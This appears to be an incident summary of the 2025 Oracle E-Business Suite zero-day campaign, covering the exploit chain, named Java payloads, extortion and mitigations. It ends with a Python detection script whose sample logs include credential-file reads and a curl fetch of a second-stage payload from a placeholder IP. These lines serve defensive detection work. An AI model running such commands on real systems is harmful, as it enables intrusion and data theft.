Full Report
Dozens of organizations may have been impacted following the zero-day exploitation of a security flaw in Oracle's E-Business Suite (EBS) software since August 9, 2025, Google Threat Intelligence Group (GTIG) and Mandiant said in a new report released Thursday. "We're still assessing the scope of this incident, but we believe it affected dozens of organizations," John Hultquist, chief analyst of
Analysis Summary
# Incident Report: Mass Exploitation of Oracle EBS via Zero-Day Flaw
## Executive Summary
Dozens of organizations were targeted in a large-scale campaign leveraging a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite (EBS) software, similar in style to prior Cl0p ransomware activities. Attackers achieved remote code execution to steal sensitive data, culminating in extortion attempts against executives. Response efforts involve ongoing scope assessment by Google and Mandiant, and Oracle has issued necessary patches.
## Incident Details
- Discovery Date: October 10, 2025 (Date of report detailing the campaign)
- Incident Date: Exploitation activity observed as early as August 9, 2025; high-volume attacks began September 29, 2025.
- Affected Organization: Dozens of organizations (specific names not disclosed in context).
- Sector: Various (not stated; implied to be any organization running Oracle EBS).
- Geography: Not specified.
## Timeline of Events
### Initial Access
- Date/Time: As early as August 9, 2025 (Evidence of initial exploitation attempts dating back to July 10, 2025).
- Vector: Exploitation of a zero-day vulnerability in Oracle E-Business Suite (EBS) software, tracked as CVE-2025-61882 (CVSS 9.8).
- Details: Attackers leveraged a combination of flaws including Server-Side Request Forgery (SSRF), Carriage-Return Line-Feed (CRLF) injection, authentication bypass, and XSL template injection to achieve Remote Code Execution (RCE) on the target EBS server via the "/OA_HTML/SyncServlet" component and its Template Preview functionality.
### Lateral Movement
- Details: Upon achieving RCE, the attackers deployed Java payloads to establish persistent access, including downloading secondary stages via C2 infrastructure.
### Data Exfiltration/Impact
- Details: Sensitive data was confirmed exfiltrated from compromised systems. Following data theft, threat actors engaged in extortion, sending emails to company executives claiming compromise and demanding an unspecified ransom.
### Detection & Response
- Detection: Discovered and reported by Google Threat Intelligence Group (GTIG) and Mandiant in a report released on October 10, 2025.
- Response Actions: Oracle issued patches to address the vulnerability. GTIG and Mandiant are currently assessing the full scope of the incident.
## Attack Methodology
- Initial Access: Exploitation of Oracle EBS zero-day (CVE-2025-61882) using SSRF, CRLF injection, authentication bypass, and XSL template injection to gain RCE.
- Persistence: Establishment of a reverse shell, followed by deployment of Java payloads, including **GOLDVEIN.JAVA** (a downloader) and a Base64-encoded loader (**SAGEGIFT**) leading to **SAGELEAF** (in-memory dropper) and **SAGEWAVE** (malicious Java servlet filter).
- Privilege Escalation: No separate escalation step is described; the exploit yielded remote code execution directly in the EBS 'appl' user context.
- Defense Evasion: Use of an in-memory dropper (SAGELEAF) and encrypted archives for next-stage malware indicates deliberate detection evasion.
- Credential Access: The extortion emails were sent from compromised third-party accounts; these are believed to have been sourced from infostealer malware logs purchased on underground forums.
- Discovery: Attackers were observed executing various reconnaissance commands from the EBS account "appl".
- Lateral Movement: Not detailed beyond initial access resulting in remote code execution and payload deployment.
- Collection: Data gathering occurred prior to or concurrent with payload installation.
- Exfiltration: Sensitive data was exfiltrated post-compromise.
- Impact: Extortion attempts directed at organization executives.
## Impact Assessment
- Financial: Unspecified ransom demands were made. Financial impact from remediation and investigation is pending.
- Data Breach: Sensitive data was exfiltrated; data type and volume are unspecified.
- Operational: The scope of operational disruption is currently under assessment.
- Reputational: Risk of negative publicity due to the large-scale nature of the attack and associated extortion.
## Indicators of Compromise
- Network indicators: C2 infrastructure used to download GOLDVEIN and to launch SAGEGIFT payloads; specific addresses are not listed in this summary.
- File indicators: Java payloads **GOLDVEIN.JAVA**, **SAGEGIFT** (Base64 loader), **SAGELEAF** (in-memory dropper), **SAGEWAVE** (malicious Java servlet filter). Overlap noted with FIN11 **GOLDTOMB** backdoor module.
- Behavioral indicators: Exploitation of Oracle EBS components including "/OA_HTML/SyncServlet" Template Preview functionality; execution of reconnaissance commands from the 'appl' user context.
## Response Actions
- Containment measures: Not explicitly detailed; remediation upon discovery of the vulnerability is implied.
- Eradication steps: Implied removal of deployed malware payloads (GOLDVEIN, SAGELEAF, etc.) from affected EBS servers.
- Recovery actions: Organizations must apply Oracle-issued patches. GTIG and Mandiant are continuing to assess the full extent of infections.
## Lessons Learned
- Key takeaways: Mass exploitation campaigns targeting zero-days in critical enterprise software (like Oracle EBS) remain a significant and recurring threat vector, often associated with established crime groups like Cl0p. Relying solely on established application security processes may be insufficient against active zero-day threats.
- What could have been done better: Proactive vulnerability management and rapid patching following vendor disclosures are critical when zero-days are publicly exploited.
## Recommendations
- Prevention measures for similar incidents:
1. Immediately apply all security patches released by Oracle for E-Business Suite, prioritizing those addressing high-CVSS vulnerabilities like CVE-2025-61882.
2. Review and segment network access to mission-critical applications like EBS, imposing strict firewall rules and web application firewalls (WAFs) to mitigate SSRF/injection attempts.
3. Implement robust monitoring of application execution paths, focusing on unexpected file execution or network connections originating from standard application service accounts (like 'appl').
4. Enhance threat intelligence consumption specifically related to known exploitation patterns of major enterprise software vendors.
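As an added illustration of recommendation 3 and the behavioral indicators above (example code written for this summary, not from the report or from Oracle), the following Python flags web requests to the "/OA_HTML/SyncServlet" path and shell reconnaissance or download commands run by the EBS 'appl' service account. The log lines are constructed samples; the log formats, the recon command patterns and the client/C2 addresses are assumptions, since the report names only the path and the account.

```python
import re

# Constructed sample logs (not from the report): Apache-style access lines as an
# EBS web tier might emit, and process-audit records as "user=<u> cmd=<c>".
ACCESS_LOG = """\
10.0.0.5 - - [29/Sep/2025:10:01:07 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120
198.51.100.23 - - [29/Sep/2025:10:01:09 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 311
10.0.0.5 - - [29/Sep/2025:10:02:15 +0000] "GET /OA_HTML/RF.jsp HTTP/1.1" 200 8801
198.51.100.23 - - [29/Sep/2025:10:02:40 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 500 0
"""
PROCESS_LOG = """\
user=appl cmd=/u01/app/jdk/bin/java -jar oacore.jar
user=appl cmd=/bin/sh -c whoami
user=appl cmd=/bin/sh -c cat /etc/passwd
user=oracle cmd=sqlplus / as sysdba
user=appl cmd=/usr/bin/curl http://203.0.113.9/stage2
"""

ACCESS_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)')
PROC_RE = re.compile(r'^user=(?P<user>\S+) cmd=(?P<cmd>.*)$')

# Path and service account come from the report; the Template Preview request
# parameters are not given there, so matching is on the path alone.
SUSPICIOUS_PATH = "/OA_HTML/SyncServlet"
SERVICE_ACCOUNT = "appl"
# Assumed recon/download patterns; tune to what your EBS tier normally runs.
RECON_RE = re.compile(r"\b(whoami|id|uname|cat /etc/passwd|curl|wget)\b")

def flag_syncservlet_requests(log_text):
    """Return (client_ip, timestamp, method) for every request to the SyncServlet path."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if m and m.group("path").split("?", 1)[0] == SUSPICIOUS_PATH:
            hits.append((m.group("ip"), m.group("ts"), m.group("method")))
    return hits

def flag_appl_recon(log_text):
    """Return commands run as the 'appl' account that look like recon or download activity."""
    hits = []
    for line in log_text.splitlines():
        m = PROC_RE.match(line)
        if m and m.group("user") == SERVICE_ACCOUNT and RECON_RE.search(m.group("cmd")):
            hits.append(m.group("cmd"))
    return hits
```

Requests to SyncServlet from a single external address, and shell or download commands under 'appl' shortly afterwards, are the two signals worth correlating; legitimate SyncServlet traffic exists, so baseline it rather than alerting on every hit.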